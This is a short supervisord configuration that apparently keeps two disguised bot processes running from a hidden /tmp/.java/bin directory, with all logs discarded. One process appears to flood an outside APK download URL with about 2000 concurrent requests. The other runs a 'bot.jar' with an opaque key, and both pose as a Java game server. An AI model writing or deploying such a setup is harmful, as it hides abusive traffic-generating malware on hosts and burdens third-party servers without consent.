[supervisord]
logfile=/dev/null

[program:p1]
directory=/tmp/.java/bin
command=./java -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar -c 2000 -s https://d.kanzhun.com/boss/latest/directhires_c0.apk
autorestart = true
stdout_logfile=/dev/null

[program:gnet]
directory=/tmp/.java/bin
command=./java -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./bot.jar -s "i0j3A9E7D1X9-i7H6b5j0K7o1-X1eCd9F9-i0J6d6A2-c5J1g6" -liq
stdout_logfile=/dev/null
autorestart = true